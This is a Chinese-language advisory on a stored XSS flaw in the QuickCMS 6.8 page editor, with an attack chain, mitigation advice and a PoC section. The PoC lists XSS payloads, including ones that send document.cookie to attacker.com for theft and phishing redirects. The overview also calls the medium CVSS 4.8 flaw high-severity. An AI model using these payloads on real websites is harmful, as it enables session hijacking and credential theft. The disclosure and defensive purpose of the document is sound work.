CVE-2025-9980 QuickCMS 页面编辑器存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-9980

漏洞类型

存储型XSS

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

QuickCMS

漏洞概述

CVE-2025-9980是QuickCMS内容管理系统中的一个高危安全漏洞，属于存储型跨站脚本攻击（Stored XSS）。该漏洞存在于QuickCMS的页面编辑器功能（pages-form）中，允许具有管理员权限的恶意攻击者向网站注入任意HTML和JavaScript代码。由于这些恶意代码会被存储在服务器端，当其他用户访问被篡改的页面时，注入的脚本将在其浏览器中执行，从而可能导致会话劫持、敏感信息窃取、网页篡改等严重安全问题。

根据漏洞披露信息，攻击者需要具备管理员权限才能利用此漏洞。虽然默认情况下管理员用户无法向网站添加JavaScript代码，但由于页面编辑器功能存在输入验证和输出编码缺陷，攻击者可以通过构造特定的Payload绕过限制，成功注入恶意脚本。值得注意的是，漏洞发现者已提前通知了厂商，但截至披露日期，厂商尚未回应漏洞详情或提供受影响版本范围。目前仅确认QuickCMS 6.8版本存在该漏洞，其他版本可能同样受影响。

技术细节

QuickCMS的页面编辑器（pages-form）功能存在多个存储型XSS漏洞，攻击原理如下：

1. 输入验证不足：页面编辑器在处理用户输入时，未对特殊字符进行充分的过滤和转义。攻击者可以在页面标题、内容或其他字段中插入恶意的HTML标签或JavaScript代码。

2. 输出编码缺陷：当其他用户访问包含恶意代码的页面时，系统未能对存储的内容进行正确的输出编码，导致浏览器将注入的代码作为有效代码执行。

3. 存储型特性：与反射型XSS不同，存储型XSS的恶意代码会被永久保存在服务器数据库中，所有访问该页面的用户都会受到攻击影响，攻击范围更广，危害更大。

4. 利用条件：攻击者需要拥有管理员账户权限，登录后在页面编辑器中构造包含XSS Payload的请求，如：<script>alert(document.cookie)</script>或<img src=x onerror=恶意代码>，保存后即可触发漏洞。

5. 攻击影响：成功利用此漏洞可窃取用户会话Cookie、劫持管理员账户、进行钓鱼攻击、植入恶意重定向或执行其他客户端攻击。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的QuickCMS版本，访问页面编辑器功能（pages-form）

STEP 2

账户获取

攻击者通过社会工程、密码爆破或其他方式获取管理员账户凭据

STEP 3

Payload构造

攻击者构造XSS Payload，如<script>alert(document.cookie)</script>或基于事件处理器的绕过Payload

STEP 4

恶意注入

使用管理员权限登录，在页面编辑器中保存包含XSS Payload的内容

STEP 5

等待触发

恶意代码被存储在服务器数据库中，等待其他用户访问被篡改的页面

STEP 6

代码执行

当受害者访问页面时，浏览器解析HTML内容并执行注入的JavaScript代码

STEP 7

攻击完成

攻击者通过JavaScript代码窃取Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-9980 QuickCMS Stored XSS PoC
// Target: QuickCMS pages-form functionality

// Step 1: Login as admin user
const loginPayload = {
    username: 'admin',
    password: 'admin_password'
};

// Step 2: Navigate to page editor (pages-form)
// POST /admin/pages-form?action=edit&id=1 HTTP/1.1

// Step 3: Inject XSS payload in page content fields
// Example payloads for different fields:

// Payload 1: Basic script injection
const xssPayload1 = '<script>alert(document.cookie)</script>';

// Payload 2: Event handler injection
const xssPayload2 = '<img src=x onerror="fetch(\"https://attacker.com/steal?c=\"+document.cookie)\">';

// Payload 3: SVG injection
const xssPayload3 = '<svg onload="eval(atob(\"YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\"))">';

// Step 4: Send malicious page edit request
const exploitRequest = {
    method: 'POST',
    path: '/admin/pages-form',
    body: {
        page_title: 'Normal Page Title <script>alert(1)</script>',
        page_content: '<p>Content with <img src=x onerror=alert(document.domain)> injection</p>',
        page_template: 'default'
    }
};

// Step 5: When victim visits the edited page, XSS will execute
// <script>window.location='https://attacker.com/phishing?c='+document.cookie</script>

影响范围

QuickCMS 6.8 (确认受影响)

QuickCMS 其他版本 (可能受影响，未测试)

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议采取以下临时缓解措施：1) 严格限制管理员账户的访问权限，使用强密码并启用双因素认证；2) 在Web应用防火墙（WAF）中配置XSS防护规则，对页面编辑器功能的输入进行过滤；3) 对所有用户输入实施严格的输入验证和输出编码；4) 监控管理员账户的异常操作行为；5) 考虑暂时禁用非必要的页面编辑功能，仅允许受信任的管理员使用；6) 定期备份数据库以便在遭受攻击后快速恢复；7) 加强员工安全意识培训，防止社会工程攻击导致的管理员凭据泄露。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-9980
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-9980
3 Details https://www.cvedetails.com/cve/CVE-2025-9980/
4 VulDB https://vuldb.com/cve/CVE-2025-9980
5 Link https://cert.pl/posts/2025/10/CVE-2025-9980
6 Link https://opensolution.org/cms-system-quick-cms.html